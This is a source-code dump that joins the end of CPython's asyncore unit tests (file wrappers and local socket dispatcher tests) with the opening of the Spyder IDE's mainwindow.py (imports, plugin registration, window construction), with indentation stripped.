fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(support.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with support.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
def test_close_twice(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all()
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.family, self.family)
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(s.socket.type,
(sock_type | socket.SOCK_CLOEXEC, sock_type))
else:
self.assertEqual(s.socket.type, sock_type)
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
sock = socket.socket(self.family)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
finally:
sock.close()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
server = BaseServer(self.family, self.addr)
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=500))
t.start()
def cleanup():
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
self.addCleanup(cleanup)
s = socket.socket(self.family, socket.SOCK_STREAM)
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
s.close()
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (support.HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (support.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
support.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QKeySequence, QIcon
from qtpy.QtWidgets import (QApplication, QMainWindow, QMenu, QMessageBox,
QShortcut, QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app.utils import (
create_application, create_splash_screen, create_window,
delete_debug_log_files, qt_message_handler, set_links_color, setup_logging,
set_opengl_implementation)
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.find_plugins import find_external_plugins, find_internal_plugins
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import (
Plugins, SpyderPlugin, SpyderPluginV2, SpyderDockablePlugin,
SpyderPluginWidget)
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent")
sig_moved = Signal("QMoveEvent")
sig_layout_setup_ready = Signal(object) # Related to default layouts
# ---- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
if plugin_name in PLUGIN_REGISTRY:
return PLUGIN_REGISTRY.get_plugin(plugin_name)
if error:
raise SpyderAPIError(f'Plugin "{plugin_name}" not found!')
return None
def get_dockable_plugins(self):
"""Get a list of all dockable plugins."""
dockable_plugins = []
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, (SpyderDockablePlugin, SpyderPluginWidget)):
dockable_plugins.append((plugin_name, plugin))
return dockable_plugins
def is_plugin_enabled(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_enabled(plugin_name)
def is_plugin_available(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_available(plugin_name)
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def register_plugin(self, plugin_name, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Connect Plugin Signals to main window methods
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Connect Main window Signals to plugin signals
self.sig_moved.connect(plugin.sig_mainwindow_moved)
self.sig_resized.connect(plugin.sig_mainwindow_resized)
# Register plugin
plugin._register(omit_conf=omit_conf)
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
if plugin_name == Plugins.Shortcuts:
for action, context, action_name in self.shortcut_queue:
self.register_shortcut(action, context, action_name)
self.shortcut_queue = []
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(action, context, action_name)
else:
self.shortcut_queue.append((action, context, action_name))
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(sc, context, name)
self.register_shortcut(
plugin.toggle_view_action, context, name)
else:
self.shortcut_queue.append((sc, context, name))
self.shortcut_queue.append(
(plugin.toggle_view_action, context, name))
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
# Show external plugins
if plugin.NAME in PLUGIN_REGISTRY.external_plugins:
plugin.get_widget().toggle_view(True)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure plugins are placed correctly when
# switching layouts.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
# Set Windows app icon to use .ico file
if os.name == "nt":
qapp.setWindowIcon(ima.get_icon("windows_app_icon"))
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
self.shortcut_queue = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins or to prevent collisions with other
# attributes, i.e layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# ---- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
PLUGIN_REGISTRY.sig_plugin_ready.connect(
lambda plugin_name, omit_conf: self.register_plugin(
plugin_name, omit_conf=omit_conf))
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
